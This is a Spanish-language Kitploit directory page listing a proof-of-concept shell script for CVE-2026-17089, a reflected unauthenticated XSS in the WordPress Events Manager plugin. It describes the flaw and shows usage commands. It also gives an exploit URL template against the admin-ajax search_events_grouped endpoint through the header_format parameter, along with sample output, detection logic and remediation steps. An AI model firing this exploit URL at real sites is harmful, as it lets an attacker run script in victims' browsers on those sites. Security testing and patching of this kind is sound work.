Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-17089-PoC-pwnVader — PoC en shell para CVE-2026-17089, un XSS reflejado no autenticado en el plugin Events Manager de WordPress (<= 7.4.0.1); identifica el plugin y prueba la reflexión de header_format. | Kitploit
Herramientas/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
Escáneres de VulnerabilidadesEscáneres de Vulnerabilidades WebAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubpwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

PoC en shell para CVE-2026-17089, un XSS reflejado no autenticado en el plugin Events Manager de WordPress (<= 7.4.0.1); identifica el plugin y prueba la reflexión de header_format.

Ver Repositorio
hace 10 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-17089 — Events Manager <= 7.4.0.1 — XSS reflejado no autenticado (header_format)

Autor: pwnVader · Licencia: MIT (raíz del repositorio)

ComponenteEvents Manager – Calendar, Bookings, Tickets, and more! (plugin de WordPress)
TipoCWE-79 — Cross-Site Scripting reflejado
Afectado<= 7.4.0.1
Corregidoversión posterior de 7.4.x (wp_kses_post() aplicado en EM_Events::output_grouped())
CVECVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

Resumen

El punto de entrada del shortcode sanitiza header_format con wp_kses(), pero la acción AJAX no autenticada search_events_grouped omite esa sanitización y refleja el valor en la respuesta HTML (EM_Events::output_grouped()). Un atacante remoto no autenticado puede crear una URL que ejecute JavaScript arbitrario en el origen del sitio afectado para cualquier usuario que la abra (UI:R).

Uso

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

Ejemplo de salida (check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

URL de explotación

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

Lógica de detección

  1. Fingerprint: readme.txt (Stable tag) y/o la ruta del recurso del plugin /wp-content/plugins/events-manager/includes/js/events-manager.js.
  2. Enviar un marcador benigno (``) a admin-ajax.php?action=search_events_grouped con header_format establecido al marcador y comprobar si el marcado sin procesar se refleja sin escapar en el cuerpo de la respuesta.

Remediación

  • Actualizar Events Manager a la versión actual (la corrección aplica wp_kses_post() a header_format dentro de la función de renderizado, cubriendo a todos los invocadores).
  • Medida provisional: bloquear la acción AJAX no autenticada search_events_grouped o filtrar header_format a nivel de WAF/aplicación.

Referencias

  • NVD — CVE-2026-17089: https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory: https://github.com/advisories/GHSA-gg76-jx66-hjq8

Descargo de responsabilidad

Solo para pruebas de seguridad autorizadas. El PoC es de solo lectura (check) o imprime una URL (url); no se modifican datos.

Descargar herramienta